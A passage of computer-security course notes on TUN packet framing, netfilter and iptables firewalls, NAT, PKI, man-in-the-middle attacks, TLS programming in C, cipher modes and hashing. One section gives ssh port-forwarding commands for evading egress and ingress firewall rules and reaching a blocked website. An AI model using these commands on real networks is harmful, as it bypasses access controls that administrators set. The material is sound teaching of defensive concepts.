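    """Prefix each packet with its length so the receiver can find the boundary."""
    sock.sendall(struct.pack("!H", len(packet)) + packet)

def recv_exact(sock, n):
    """Keep reading until exactly n bytes have arrived."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf

def recv_packet(sock):
    """Read one length header, then exactly that many bytes."""
    (length,) = struct.unpack("!H", recv_exact(sock, 2))
    return recv_exact(sock, length)

# A connected stream socket pair stands in for the TCP connection.
a, b = socket.socketpair()
send_packet(a, b"first packet")
send_packet(a, b"second")
print(recv_packet(b))  # b'first packet'
print(recv_packet(b))  # b'second'
```

Even though both packets may arrive in a single TCP segment, the receiver still hands them to the TUN interface one at a time.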
Linux Firewall
-
Three types of firewall
- Packet filter (stateless)
- Stateful firewall (able to monitor connections and other persistent information)
- Application/proxy firewall
-
The `netfilter` interface in Linux
-
The `netfilter` interface provided by the Linux kernel allows one to insert high-performance firewall modules into the kernel.
-
The `Makefile` to compile kernel modules (assume the kernel module is `kmod.c`)
```makefile
obj-m += kmod.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
```
-
Operations of `netfilter`
- `NF_ACCEPT`: let the packet flow through the stack.
- `NF_DROP`: discard the packet.
- `NF_QUEUE`: pass the packet to user space via the `nf_queue` facility.
- `NF_STOLEN`: inform the `netfilter` framework to forget the packet. Further processing of this packet is handed over to the custom firewall module.
- `NF_REPEAT`: request `netfilter` to call this module again.
-
`netfilter` hooks
- SNAT is performed at `POST_ROUTING`
-
Sample firewall module based on `netfilter`
```c
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/ip.h>
#include <linux/tcp.h>

static struct nf_hook_ops telnetFilterHook;

/* Drop outgoing TCP packets whose destination port is 23 (telnet). */
unsigned int telnetFilter(void *priv, struct sk_buff *skb,
                          const struct nf_hook_state *state)
{
    struct iphdr *iph;
    struct tcphdr *tcph;

    iph = ip_hdr(skb);
    /* The TCP header starts right after the IP header (IHL is in 4-byte units). */
    tcph = (void *)iph + iph->ihl * 4;

    if (iph->protocol == IPPROTO_TCP && tcph->dest == htons(23)) {
        return NF_DROP;
    } else {
        return NF_ACCEPT;
    }
}

int setUpFilter(void)
{
    telnetFilterHook.hook = telnetFilter;
    telnetFilterHook.hooknum = NF_INET_POST_ROUTING;
    telnetFilterHook.pf = PF_INET;
    telnetFilterHook.priority = NF_IP_PRI_FIRST;

    /* Register the hook. nf_register_hook() was removed in Linux 4.13;
       newer kernels use nf_register_net_hook(&init_net, ...) instead. */
    nf_register_hook(&telnetFilterHook);
    return 0;
}

void removeFilter(void)
{
    nf_unregister_hook(&telnetFilterHook);
}

module_init(setUpFilter);
module_exit(removeFilter);

MODULE_LICENSE("GPL");
```
-
-
`iptables` firewall
-
`iptables` is a frontend of `netfilter` which provides a lot of powerful functionalities.
-
The packet traversal graph of `iptables`
-
`iptables` Tables and Chains
| Table | Chain | Functionality |
| --- | --- | --- |
| filter | INPUT, FORWARD, OUTPUT | Packet filtering |
| nat | PREROUTING, INPUT, OUTPUT, POSTROUTING | Modifying src/dst network address |
| mangle | PREROUTING, INPUT, FORWARD, OUTPUT, POSTROUTING | Packet content modification |
-
Examples
Assume A’s IP is 10.0.2.5; B’s IP is 10.0.2.6.
-
Incrementing all incoming packets’ TTL by 5
sudo iptables -t mangle -A PREROUTING -j TTL --ttl-inc 5
-
Prevent A from doing `telnet` to B
sudo iptables -t filter -A OUTPUT -p tcp --dport 23 -d 10.0.2.6 -j DROP
-
Prevent A from receiving `telnet` requests from B
sudo iptables -t filter -A INPUT -p tcp --dport 23 -s 10.0.2.6 -j DROP
-
Prevent A from visiting an external website
Assume the IP address of the website is 157.240.18.35.
sudo iptables -t filter -A OUTPUT -p tcp -m multiport --dports 80,443 -d 157.240.18.35 -j DROP
-
-
Evading packet filtering
-
Evading egress filtering
Suppose rule 2 in the previous bullet point is active. We can `ssh` into machine B and forward a local port to B's port 23.
ssh -L 8000:localhost:23 seed@10.0.2.6
Now, we can `telnet` to localhost's port 8000 in order to `telnet` to machine B.
telnet localhost 8000
-
Browsing another website
Suppose rule 4 in the previous bullet point is active. In order to browse the website, we can `ssh` to machine B with dynamic port forwarding.
ssh -D 8000 -C seed@10.0.2.6
In order to browse the blocked website, we can set up a SOCKS proxy in Firefox at 127.0.0.1:8000.
-
Evading ingress filtering
Suppose rule 3 in the previous bullet point is active. From machine A, we can `ssh` to machine B with remote port forwarding:
ssh -R 8000:localhost:23 seed@10.0.2.6
Now, on machine B, the user can telnet to his own 127.0.0.1:8000, and it will eventually reach machine A.
-
-
Connection based rules
Suppose we want to limit the number of TCP connections from a specific IP address. We can run:
sudo iptables -A INPUT -p tcp --syn --dport 80 -s 10.0.2.5 -m connlimit --connlimit-above 1 --connlimit-mask 32 -j REJECT --reject-with tcp-reset
This limits the number of concurrent connections from 10.0.2.5 to port 80 to 1.
-
-
NAT: Network Address Translation
-
NAT is used to mitigate the shortage of IPv4 addresses.
-
DNAT (Destination NAT): used to publish a service located inside a private network. It’s called DNAT because the router effectively changes the destination IP address of arrived packets (to the mapped machine’s address). DNAT is also called port forwarding.
-
SNAT (Source NAT): used to allow machines inside a private network to talk with outside servers. It’s called SNAT because the router effectively changes the source IP address of arrived packets (to its own address).
-
SNAT Example
| Role | VM IP |
| --- | --- |
| A | 10.0.2.5 |
| G (Gateway) | 10.0.2.6, 192.168.60.1 |
| B | 192.168.60.101 |

Without SNAT, B cannot reach A. To set up a SNAT, on G, we run:
sudo sysctl net.ipv4.ip_forward=1
sudo iptables -t nat -A POSTROUTING -o enp0s3 -j SNAT --to-source 10.0.2.6
Basically, the source address of outgoing packets will be changed to 10.0.2.6. On the gateway, a specific port is associated with machine B so that when the reply comes back, it will be forwarded to B instead of other machines.
-
DNAT Example
Suppose I want to `telnet` from A to B. Without DNAT, A cannot reach B. We can set up a DNAT that forwards G's port 8000 to B's port 23:
sudo sysctl net.ipv4.ip_forward=1
sudo iptables -t nat -A PREROUTING -p tcp --dport 8000 -j DNAT --to-destination 192.168.60.101:23
-
Load balancing with DNAT
Another purpose of DNAT is to achieve load balancing, because a port on G can be mapped to multiple destinations. For example, we can set up a hypothetical load balancing application that forwards packets to different ports of B:
sudo sysctl net.ipv4.ip_forward=1
sudo iptables -t nat -A PREROUTING -p tcp --dport 8000 -m statistic --mode random --probability .50 -j DNAT --to-destination 192.168.60.101:9000
sudo iptables -t nat -A PREROUTING -p tcp --dport 8000 -m statistic --mode random --probability 1.0 -j DNAT --to-destination 192.168.60.101:9001
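The second rule has probability 1.0 because rules are evaluated in order: a rule only sees the packets that no earlier rule matched, so its effective probability is its own probability multiplied by the share of traffic that is still left. The first rule takes 50%, and the second rule takes all of the remaining 50%. Therefore, each rule has a 50% chance.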
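The same reasoning extends to more than two destinations. The sketch below computes the effective share of each rule from the per-rule `--probability` values; the helper name is made up for this example.

```python
def effective_probabilities(rule_probabilities):
    """Share of all traffic that each rule ends up handling."""
    remaining = 1.0   # fraction of traffic not matched by earlier rules
    shares = []
    for p in rule_probabilities:
        shares.append(remaining * p)
        remaining *= 1.0 - p
    return shares

print(effective_probabilities([0.5, 1.0]))        # [0.5, 0.5]
print(effective_probabilities([1 / 3, 0.5, 1.0])) # three roughly equal shares
```

So to balance over three destinations, the rules would use probabilities 1/3, 1/2 and 1.0 in that order.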
-
PKI (Public Key Infrastructure)
-
Public-key cryptography
Briefly speaking, public-key cryptographic algorithms have a public key `p` and a private key `e`. Anyone can encrypt data with `p`, but only the holder of `e` can decrypt. Conversely, the holder of `e` can encrypt a message with `e`, and anyone that has `p` can decrypt the message. This implies that:
- Encryption and decryption are one-way: without the corresponding keys, given the ciphertext, it is difficult to get the plaintext; given the plaintext, it is difficult to get the ciphertext.
- Anyone can transfer information to the holder of `e` securely. Only the holder of `e` can decrypt the message.
- The holder of `e` can prove a message is indeed sent from him by sending the message together with a version of the message encrypted with `e`. The receiver can verify the author by decrypting that version with `p` and comparing it with the actual message. (This is known as a digital signature.)
-
Diffie-Hellman key exchange
DH allows two parties to exchange a secret key securely. Suppose there are two sides A and B, then:
- A and B agree on a large prime \(p\) and a generator \(g\) (a small positive integer). Both values are public.
- A picks a random positive integer \(x < p\) and sends \(g^x \bmod p\) to B.
- B picks a random positive integer \(y < p\) and sends \(g^y \bmod p\) to A.
- Both A and B can compute the shared secret \(K = g^{xy} \bmod p\): A raises the value received from B to the power \(x\), and B raises the value received from A to the power \(y\).
An outsider will not be able to get \(K\) because he does not know \(x\) or \(y\).
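The exchange can be tried out with Python's built-in modular exponentiation. This is a toy sketch: \(p = 23\) and \(g = 5\) are deliberately tiny textbook parameters, whereas real DH uses primes of 2048 bits or more.

```python
import secrets

def dh_public(g, p, private):
    """Value sent over the wire: g^private mod p."""
    return pow(g, private, p)

def dh_shared(peer_public, p, private):
    """Shared secret: (peer's public value)^private mod p."""
    return pow(peer_public, private, p)

p, g = 23, 5   # toy parameters, far too small for real use

x = secrets.randbelow(p - 2) + 1   # A's secret, 1 <= x <= p-2
y = secrets.randbelow(p - 2) + 1   # B's secret, 1 <= y <= p-2

A_pub = dh_public(g, p, x)   # A -> B
B_pub = dh_public(g, p, y)   # B -> A

k_a = dh_shared(B_pub, p, x)   # computed by A
k_b = dh_shared(A_pub, p, y)   # computed by B
print(k_a == k_b)              # True: both sides hold g^(xy) mod p
```

An eavesdropper sees only `p`, `g`, `A_pub` and `B_pub`. Nothing in the exchange authenticates who sent them, which is what the MITM attack exploits.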
-
Man-In-The-Middle (MITM) Attack
Despite the fact that the combination of public-key cryptography and DH seems to be secure, it is susceptible to MITM attacks. That is to say, an attacker C can talk with A and B at the same time, tricking each party into thinking that C is the other side. In this way, C can steal the secret. The PKI is intended to defeat MITM attack.
-
An example: A and B intend to talk directly. However, M can intercept their traffic, so the connection actually looks like A⟷M⟷B.
- M intercepts the public key that A sends to B and forwards his own public key to B instead.
- When B wants to send something to A, B will encrypt the message with M’s public key.
- M can decrypt the message, read or modify it, and encrypt it again with A’s public key.
- M sends the message to A.
Neither party will be able to spot M, and their traffic is completely compromised.
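The same interception works against an unauthenticated Diffie-Hellman exchange. The sketch below is a toy simulation under assumed parameters (a 64-bit prime and an arbitrary base, both chosen only for the demo): M replaces each public value in transit with his own, so A and B each end up sharing a key with M rather than with each other.

```python
import secrets

# Toy public parameters (assumption, illustration only).
p = 0xFFFFFFFFFFFFFFC5   # 2**64 - 59, a prime
g = 5

def keypair():
    private = secrets.randbelow(p - 2) + 1
    return private, pow(g, private, p)

a_priv, a_pub = keypair()   # A
b_priv, b_pub = keypair()   # B
m_priv, m_pub = keypair()   # attacker M

# M intercepts a_pub and b_pub and forwards m_pub to both sides instead.
key_a = pow(m_pub, a_priv, p)         # A believes this key is shared with B
key_b = pow(m_pub, b_priv, p)         # B believes this key is shared with A

m_key_with_a = pow(a_pub, m_priv, p)  # M can derive A's key
m_key_with_b = pow(b_pub, m_priv, p)  # M can derive B's key
```

Nothing in the exchange tells A or B whose public value they received, which is the gap that certificates close.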
-
-
How PKI defeats MITM attack
- Two key components in PKI
- Digital certificates: a certificate is a document that proves the ownership of the public key it contains. Digital certificates are signed by CAs, who certify the ownership of the contained public keys.
- Certificate Authorities (CAs): they are responsible for verifying the identity of users and providing them with signed digital certificates.
- The certificates (public keys) of CAs are already installed in operating systems and browsers. This is the root of trust.
- If the attacker…
- Creates a fake certificate: the certificate cannot be signed by a trusted CA. Therefore, it will not be accepted by browsers.
- Forwards the real certificate: the validation will pass in browser. However, the session key will be encrypted with the real certificate’s public key afterwards. The attacker will be unable to get the session key, and the actual traffic stays encrypted.
- Uses his own certificate: the common name of his own certificate will differ from that of the attacked website. Therefore, it will not be accepted by browsers.
-
How to create a self-signed CA and issue certificates
-
Generate a public/private key pair and a self-signed certificate for the CA
openssl req -x509 -newkey rsa:4096 -sha256 -keyout key.pem -out cert.pem
-
Generate public/private key pairs for a server
openssl genrsa -aes128 -out server_key.pem 2048
-
Generate certificate signing request
openssl req -new -key server_key.pem -out server.csr -sha256
-
Sign the certificate on CA side
openssl ca -in server.csr -out server_cert.pem -md sha256 -cert cert.pem -keyfile key.pem
-
Deploy the certificate on the server side: put the private key and the certificate into one file
cp server_key.pem server_deploy.pem
cat server_cert.pem >> server_deploy.pem
-
Test the certificate with the openssl test server
openssl s_server -cert server_deploy.pem -accept 4433 -www
-
TLS: Transport Layer Security
- The goal of TLS is to guarantee:
- Confidentiality: no other parties can see the actual content of communication.
- Integrity: if data are tampered with by others, the channel should be able to detect it.
- Authentication: at least one end of the channel should be verified.
-
TLS Programming
-
Sample client
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

#define CHK_SSL(err) if ((err) < 1) { ERR_print_errors_fp(stderr); exit(2); }
#define CA_DIR "ca_client"

// Optional verification callback: prints the subject of each certificate and
// the result of its check. It is not registered below (NULL is passed to
// SSL_CTX_set_verify); pass it as the third argument to enable it.
int verify_callback(int preverify_ok, X509_STORE_CTX *x509_ctx)
{
    char buf[300];
    X509* cert = X509_STORE_CTX_get_current_cert(x509_ctx);
    X509_NAME_oneline(X509_get_subject_name(cert), buf, 300);
    printf("subject= %s\n", buf);

    if (preverify_ok == 1) {
        printf("Verification passed.\n");
    } else {
        int err = X509_STORE_CTX_get_error(x509_ctx);
        printf("Verification failed: %s.\n", X509_verify_cert_error_string(err));
    }
    return preverify_ok;  // returning 0 makes the verification (and the handshake) fail
}

SSL* setupTLSClient(const char* hostname)
{
    // Step 0: OpenSSL library initialization
    // This step is no longer needed as of version 1.1.0.
    SSL_library_init();
    SSL_load_error_strings();
    SSLeay_add_ssl_algorithms();

    const SSL_METHOD *meth;
    SSL_CTX* ctx;
    SSL* ssl;

    meth = TLSv1_2_method();
    ctx = SSL_CTX_new(meth);

    // Require a valid server certificate, checked against the CAs in CA_DIR
    SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);
    if (SSL_CTX_load_verify_locations(ctx, NULL, CA_DIR) < 1) {
        printf("Error setting the verify locations.\n");
        exit(0);
    }
    ssl = SSL_new(ctx);

    // Enable the hostname check against the name(s) in the certificate
    X509_VERIFY_PARAM *vpm = SSL_get0_param(ssl);
    X509_VERIFY_PARAM_set1_host(vpm, hostname, 0);

    return ssl;
}

int setupTCPClient(const char* hostname, int port)
{
    struct sockaddr_in server_addr;

    // Get the IP address from hostname
    struct hostent* hp = gethostbyname(hostname);
    if (hp == NULL) {
        fprintf(stderr, "Cannot resolve %s\n", hostname);
        exit(1);
    }

    // Create a TCP socket
    int sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    // Fill in the destination information (IP, port #, and family)
    memset(&server_addr, '\0', sizeof(server_addr));
    memcpy(&(server_addr.sin_addr.s_addr), hp->h_addr, hp->h_length);
    // server_addr.sin_addr.s_addr = inet_addr ("10.0.2.14");
    server_addr.sin_port = htons(port);
    server_addr.sin_family = AF_INET;

    // Connect to the destination
    if (connect(sockfd, (struct sockaddr*) &server_addr, sizeof(server_addr)) == -1) {
        perror("connect");
        exit(1);
    }

    return sockfd;
}

int main(int argc, char *argv[])
{
    const char *hostname = "yahoo.com";
    int port = 443;

    if (argc > 1) hostname = argv[1];
    if (argc > 2) port = atoi(argv[2]);

    /*----------------TLS initialization ----------------*/
    SSL *ssl = setupTLSClient(hostname);

    /*----------------Create a TCP connection ---------------*/
    int sockfd = setupTCPClient(hostname, port);

    /*----------------TLS handshake ---------------------*/
    SSL_set_fd(ssl, sockfd);
    int err = SSL_connect(ssl);
    CHK_SSL(err);
    printf("SSL connection is successful\n");
    printf("SSL connection using %s\n", SSL_get_cipher(ssl));

    /*----------------Send/Receive data --------------------*/
    char buf[9000];
    char sendBuf[200];
    snprintf(sendBuf, sizeof(sendBuf), "GET / HTTP/1.1\r\nHost: %s\r\n\r\n", hostname);
    SSL_write(ssl, sendBuf, strlen(sendBuf));

    // Stop on EOF or error (len <= 0) before len is used as an index
    int len;
    while ((len = SSL_read(ssl, buf, sizeof(buf) - 1)) > 0) {
        buf[len] = '\0';
        printf("%s\n", buf);
    }
    return 0;
}
-
Sample server
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <openssl/ssl.h>
#include <openssl/err.h>

#define CHK_SSL(err) if ((err) < 1) { ERR_print_errors_fp(stderr); exit(2); }
#define CHK_ERR(err,s) if ((err)==-1) { perror(s); exit(1); }

int setupTCPServer();                      // Defined below
void processRequest(SSL* ssl, int sock);   // Defined below

int main()
{
    const SSL_METHOD *meth;
    SSL_CTX* ctx;
    SSL *ssl;

    // Step 0: OpenSSL library initialization
    // This step is no longer needed as of version 1.1.0.
    SSL_library_init();
    SSL_load_error_strings();
    SSLeay_add_ssl_algorithms();

    // Step 1: SSL context initialization
    meth = TLSv1_2_method();
    ctx = SSL_CTX_new(meth);
    SSL_CTX_set_verify(ctx, SSL_VERIFY_NONE, NULL);

    // Step 2: Set up the server certificate and private key
    SSL_CTX_use_certificate_file(ctx, "./cert_server/server-cert.pem", SSL_FILETYPE_PEM);
    SSL_CTX_use_PrivateKey_file(ctx, "./cert_server/server-key.pem", SSL_FILETYPE_PEM);

    // Step 3: Create a new SSL structure for a connection
    ssl = SSL_new(ctx);

    struct sockaddr_in sa_client;
    int listen_sock = setupTCPServer();

    while (1) {
        // accept() expects a socklen_t initialized to the size of the address buffer
        socklen_t client_len = sizeof(sa_client);
        int sock = accept(listen_sock, (struct sockaddr*)&sa_client, &client_len);
        if (fork() == 0) { // The child process
            close(listen_sock);

            SSL_set_fd(ssl, sock);
            int err = SSL_accept(ssl);
            CHK_SSL(err);
            printf("SSL connection established!\n");

            processRequest(ssl, sock);
            close(sock);
            return 0;
        } else { // The parent process
            close(sock);
        }
    }
}

int setupTCPServer()
{
    struct sockaddr_in sa_server;
    int listen_sock;

    listen_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    CHK_ERR(listen_sock, "socket");
    memset(&sa_server, '\0', sizeof(sa_server));
    sa_server.sin_family = AF_INET;
    sa_server.sin_addr.s_addr = INADDR_ANY;
    sa_server.sin_port = htons(4433);
    int err = bind(listen_sock, (struct sockaddr*)&sa_server, sizeof(sa_server));
    CHK_ERR(err, "bind");
    err = listen(listen_sock, 5);
    CHK_ERR(err, "listen");
    return listen_sock;
}

void processRequest(SSL* ssl, int sock)
{
    char buf[1024];
    int len = SSL_read(ssl, buf, sizeof(buf) - 1);
    if (len < 0) len = 0;   // on error, avoid writing before the start of buf
    buf[len] = '\0';
    printf("Received: %s\n", buf);

    // Construct and send the HTML page
    char *html =
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n\r\n"
        "<!DOCTYPE html><html>"
        "<head><title>Hello World</title>"
        "<style>body {background-color: black}"
        "h1 {font-size:3cm; text-align: center; color: white;"
        "text-shadow: 0 0 3mm yellow}</style></head>"
        "<body><h1>Hello, world!</h1></body></html>";
    SSL_write(ssl, html, strlen(html));
    SSL_shutdown(ssl);
    SSL_free(ssl);
}
-
Q&A
-
Which line of client code verifies the validity of the server certificate?
Answer: It’s the following lines of code:
SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);
if (SSL_CTX_load_verify_locations(ctx, NULL, CA_DIR) < 1) {
    printf("Error setting the verify locations.\n");
    exit(0);
}
The SSL_VERIFY_PEER option enforces the certificate check. On the server side, this is usually SSL_VERIFY_NONE because most TLS clients do not have a certificate.
-
How does the client guarantee that the server is the owner of the certificate?
Answer: The server proves that it is the owner of the certificate by holding the private key that corresponds to the public key in the certificate. With RSA key exchange, the client encrypts the pre-master secret with that public key during the TLS handshake. A server without the correct private key cannot decrypt it, and therefore cannot calculate the correct session key.
-
Which line of client code verifies if the server is the intended server?
Answer: it’s the common name (hostname) check.
X509_VERIFY_PARAM *vpm = SSL_get0_param(ssl);
X509_VERIFY_PARAM_set1_host(vpm, hostname, 0);
-
Which line of client code forces TLS handshake to stop if verification fails?
Answer: With SSL_VERIFY_PEER set, a failed certificate check aborts the handshake. If a callback such as verify_callback is registered (as the third argument of SSL_CTX_set_verify), its return value makes the decision: it returns preverify_ok, which is 0 when the verification failed, and this stops the TLS handshake.
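For comparison, the same two client-side checks (certificate validity and hostname match) can be sketched with Python's standard `ssl` module. This is not part of the course code; the function name `make_client_context` and the `ca_dir` parameter are hypothetical, and the directory is assumed to contain hashed CA certificates like `ca_client` in the C sample.

```python
import ssl

def make_client_context(ca_dir=None):
    """Build a client-side TLS context that enforces both checks."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    # Counterpart of SSL_VERIFY_PEER: the handshake fails on an invalid certificate.
    ctx.verify_mode = ssl.CERT_REQUIRED
    # Counterpart of X509_VERIFY_PARAM_set1_host: the certificate must match the hostname.
    ctx.check_hostname = True
    if ca_dir is not None:
        ctx.load_verify_locations(capath=ca_dir)   # trust only the CAs in this directory
    else:
        ctx.load_default_certs()                   # fall back to the system trust store
    return ctx

ctx = make_client_context()
```

A connection would then be wrapped with `ctx.wrap_socket(sock, server_hostname=hostname)`; if either check fails, the handshake raises an exception instead of returning a usable socket.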
-
-
-
Case studies
-
Usually, when a user connects to a server with TLS, the user provides the domain name of the server, and the actual IP address of the server is acquired by DNS. What if a user tries to connect to a server given an IP address? Is it going to be secure?
Answer: No! In this case the client has no trusted name to check the certificate against: both the domain name and the certificate are provided by the other side, which may be the attacker. As a result, the common name check can be defeated!
-
Even if the IP is genuine, the approach above is still insecure, because an attacker can sniff your traffic, spoof the reverse DNS lookup result, and present his own certificate to the user. In this way, the attacker can decrypt your traffic.
However, if you reach a server by its domain name, you force the other side to provide a valid certificate with a matching common name. Usually, this is not doable unless the other side is indeed the desired one.
-
Secret-key Encryption
-
Common ciphers
- Monoalphabetic substitution cipher (can be broken w/ frequency analysis)
- Polyalphabetic substitution cipher
- DES (key size=56 bits, block size=64 bits), AES (key size=128, 192 or 256 bits, block size=128 bits)
-
Attack models
- Ciphertext-only attack: the attacker only knows the ciphertext. If this does not lead to leakage of further information, the encryption is considered secure under this model.
- Known-plaintext attack: the attacker knows some plaintext together with its ciphertext. If this does not lead to leakage of further information, the encryption is considered secure under this model.
- Chosen-plaintext attack: the attacker can choose a specific plaintext and obtain its corresponding ciphertext. If this does not lead to leakage of further information, the encryption is considered secure under this model.
-
Encryption modes
-
Electronic Codebook Mode (ECB)
The problem with this encryption mode is the lack of diffusion: identical plaintext blocks result in identical ciphertext blocks, which means the structure of the plaintext can be leaked.
-
Cipher Block Chaining (CBC)
In this mode, decryption can be done in parallel if all ciphertext blocks are available. However, encryption cannot be done in parallel because the output of a ciphertext block depends on the previous one.
The initialization vector (IV) is used to ensure same plaintext will not generate the same ciphertext. IV is not considered a secret: it can be released without damage.
- Question: Suppose that during transmission, the fifth bit of the second ciphertext block is corrupted. How much data will be lost? Answer: we will lose the entire second plaintext block as well as the fifth bit of the third plaintext block.
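To see why, write CBC decryption as a formula. The symbols are notation assumed for this sketch: \(D_K\) is block decryption under the key, \(C_i\) and \(P_i\) are the ciphertext and plaintext blocks, primes mark the values the receiver actually sees, and \(e\) is a block whose only set bit is the fifth one.

\[
\begin{aligned}
P_i &= D_K(C_i) \oplus C_{i-1} \\
C_2' &= C_2 \oplus e \\
P_2' &= D_K(C_2 \oplus e) \oplus C_1 && \text{(unpredictable: the whole block is lost)} \\
P_3' &= D_K(C_3) \oplus C_2' = P_3 \oplus e && \text{(only the fifth bit flips)} \\
P_4' &= D_K(C_4) \oplus C_3 = P_4 && \text{(unaffected)}
\end{aligned}
\]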
-
Cipher Feedback (CFB)
This is similar to CBC. One important property of CFB is that we have turned a block cipher into a stream cipher, that is, we can do encryption and transmission bit by bit.
-
Output Feedback (OFB)
This mode is similar to CFB, except that the data is fed into the next block before the XOR operation. Since the key stream does not depend on the plaintext, it can be generated in advance, without waiting for the plaintext. OFB also has the stream cipher property. It is essentially using a cipher as a random number generator.
-
Counter Mode (CTR)
Counter mode works with a nonce and a block counter. Because each block depends only on the nonce and its own counter value, both encryption and decryption can be done in parallel. Like the IV, the nonce does not necessarily need to be kept secret.
-
-
Modes that do not require padding: CFB, OFB, CTR (effectively stream ciphers)
-
Initialization Vectors and common mistakes
IVs are not necessarily secrets. However, this does not mean that we can select them at will. If we do not follow certain rules, this will result in severe security flaws. We discuss the following scenarios provided that the encryption key stays the same.
-
Common mistake: using the same IV
A basic requirement for IV is uniqueness, which means no IV should be reused under the same key. For some cipher modes, reusing IV can be catastrophic. In OFB, the use of static IV will make the encryption scheme vulnerable to known plaintext attack. If the attacker knows both plaintext and ciphertext, the attacker will be able to decrypt all subsequent ciphertext, if the IV is reused. That is because the output of OFB will always be the same if the key and IV are identical.
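The following toy sketch illustrates the reuse problem. It is not a real cipher: `toy_block_encrypt` is a hypothetical stand-in built from SHA-256 (OFB only ever uses the forward direction of the block cipher), and the key, IV and messages are made up for the demo.

```python
import hashlib

BLOCK = 16

def toy_block_encrypt(key, block):
    # Stand-in for a real block cipher such as AES (assumption for this demo).
    return hashlib.sha256(key + block).digest()[:BLOCK]

def ofb_keystream(key, iv, length):
    # OFB: repeatedly encrypt the previous output; the plaintext is never involved.
    stream, state = b"", iv
    while len(stream) < length:
        state = toy_block_encrypt(key, state)
        stream += state
    return stream[:length]

def ofb_xor(key, iv, data):
    # Encryption and decryption are the same XOR with the key stream.
    ks = ofb_keystream(key, iv, len(data))
    return bytes(a ^ b for a, b in zip(data, ks))

key = b"secret key 12345"
iv = b"\x00" * BLOCK                      # the mistake: the same IV for every message

known_plain = b"Attack at dawn!!"         # the attacker knows this message
c1 = ofb_xor(key, iv, known_plain)
secret_plain = b"Retreat at noon!"        # the attacker does not know this one
c2 = ofb_xor(key, iv, secret_plain)

# Attacker's view: known_plain, c1 and c2, but not the key.
keystream = bytes(a ^ b for a, b in zip(known_plain, c1))
recovered = bytes(a ^ b for a, b in zip(c2, keystream))
```

The attacker never touches the key: one known plaintext/ciphertext pair yields the key stream, and the key stream decrypts everything else sent under the same key and IV.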
-
Common mistake: using predictable IV
If the IV is predictable, it will create security flaw in some encryption modes, e.g. CBC. Using predictable IV will make CBC susceptible to chosen plaintext attack. There are three assumptions under this scenario:
- The IV used for next message is predictable.
- CBC is used.
- The victim will encrypt any plaintext the attacker provides.
Then the attacker can test a guess of what message was sent by the victim. He XORs his guess with the previous IV and the (predicted) next IV, and asks the victim to encrypt the result. If the resulting ciphertext equals the previous ciphertext, the guess is correct.
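The reasoning can be written out for the first block. The symbols are notation assumed for this sketch: \(E_K\) is block encryption under the key, \(P_1\) is the victim's unknown message encrypted with \(IV_1\), \(G\) is the attacker's guess, and \(IV_2\) is the predicted next IV.

\[
\begin{aligned}
C_1 &= E_K(P_1 \oplus IV_1) \\
P_2 &= G \oplus IV_1 \oplus IV_2 && \text{(plaintext submitted by the attacker)} \\
C_2 &= E_K(P_2 \oplus IV_2) = E_K(G \oplus IV_1) \\
C_2 &= C_1 \iff G = P_1
\end{aligned}
\]

With a random, unpredictable IV the attacker cannot construct \(P_2\) in advance, so the comparison tells him nothing.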
-
One-way Hash Function
-
What hash functions do: they generate a fixed length digest for a message of arbitrary length.
-
Properties of a cryptographic hash function
Denote the hash function by \(h\).
- One-way: Given a hashed value \(v\), it should be difficult to find a message \(m\) such that \(h(m)=v\).
- Collision resistant: It should be difficult to find two messages \(m_1\) and \(m_2\) such that \(h(m_1) = h(m_2)\).
-
Case study: the number game
A and B both come up with a number. If the sum is even, then A wins; otherwise B wins.
- The dilemma: anyone that releases his number first loses.
- Resolving the dilemma with a hash function
- A chooses his number and sends the hashed value of his number to B.
- When B acquires A’s hash value, B can disclose his number to A.
- After receiving B’s answer, A reveals his answer. B can verify A indeed chose this number by comparing the hash value.
- This is fair for A because of one-way property. Given the hash value, it is difficult for B to know what number is chosen by A.
- This is fair for B because of the collision-resistant property: it is difficult for A to find multiple values that hash to the same value. That is, the value revealed in the third step is indeed the value A chose.
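The protocol above can be sketched as follows. One detail goes beyond the notes and is an assumption of this sketch: the number is hashed together with a random nonce, because a small number hashed on its own could be found by simply trying every candidate. The function names `commit` and `verify` are hypothetical.

```python
import hashlib
import secrets

def commit(number):
    """A's first step: publish the digest, keep the number and nonce private."""
    nonce = secrets.token_bytes(16)
    digest = hashlib.sha256(nonce + str(number).encode()).hexdigest()
    return digest, nonce

def verify(commitment, number, nonce):
    """B's check in the last step: recompute the digest from the revealed values."""
    return hashlib.sha256(nonce + str(number).encode()).hexdigest() == commitment

a_number = 7
commitment, a_nonce = commit(a_number)   # step 1: A sends only the commitment to B

b_number = 4                             # step 2: B discloses his number

ok = verify(commitment, a_number, a_nonce)   # step 3: A reveals, B verifies
winner = "A" if (a_number + b_number) % 2 == 0 else "B"
```

If A tried to reveal a different number after seeing B's choice, `verify` would fail unless A had found a collision.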
-
Common hash functions
-
The Message Digest (MD) series: MD2, MD4, MD5
MD2 and MD4 are severely flawed and should not be used. The collision-resistant property of MD5 is broken, although its one-way property has not been broken in practice.
-
The Secure Hash Algorithm (SHA) series: SHA1, SHA-2, SHA-3
-
-
How hash function works
Most hash functions use a similar construction structure called Merkle–Damgård construction. Input data is broken into blocks of fixed size, with a padding added to the last block. Each block and the output of the previous iteration are fed into a compression function; the first iteration uses a fixed value called IV as one of its inputs.
Notice that SHA-3 does not use this structure anymore.
- Applications of hash functions
-
Integrity verification
If we change a bit in the message, its hash value would be completely different. Therefore, we can use the hash value to determine if a document/file has been modified or not.
-
Committing a secret without telling it
